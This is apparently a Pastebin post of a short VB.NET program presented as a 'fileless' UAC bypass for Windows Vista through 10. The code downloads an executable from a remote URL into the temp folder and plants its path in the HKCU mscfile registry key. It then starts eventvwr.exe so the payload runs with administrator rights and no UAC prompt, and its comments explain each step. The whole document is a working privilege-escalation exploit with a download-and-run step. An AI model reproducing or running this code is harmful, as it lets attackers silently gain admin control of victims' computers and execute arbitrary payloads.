FlyFar

"Fileless" UAC Bypass Example - Windows 7/8/8.1/10

Jul 17th, 2023
106
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VB.NET 1.21 KB | Cybersecurity | 0 0
  1. 'Tested on Windows Vista, 7, 8, 8.1, 10 32/64Bit
  2. 'Based off; https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
  3. 'Can be done in any language that supports interaction with Windows resistry
  4. Module Module1
  5.     Dim URLtoFile As String = "https://the.earth.li/~sgtatham/putty/latest/x86/putty.exe" 'URL to PayLoad
  6.     Dim FilePath As String = IO.Path.GetTempPath
  7.     'How this works
  8.     'When eventvwr.exe is ran it starts a process call mmc.exe using the key HKLM\Software\Classes\mscfile\shell\open\command as admin
  9.     'eventvwr.exe also will lounch the key in HLCU so you just make a key and lounch
  10.     Sub Main()
  11.         Dim Client As New Net.WebClient
  12.         Client.DownloadFile(URLtoFile, FilePath + "payload.exe") 'Downlaod and Save the Payload
  13.         Microsoft.Win32.Registry.CurrentUser.CreateSubKey("Software\Classes\mscfile\shell\open\command").SetValue("", FilePath + "payload.exe") 'Create a registry entry to the payload
  14.         Process.Start("eventvwr.exe") 'Start Event Viewer
  15.         'This makes Windows lounch the payload with admin rights, as a background application
  16. 'You should also delete the key made so even viewer works normal again.
  17.     End Sub
  18.  
  19. End Module
Add Comment
Please, Sign In to add comment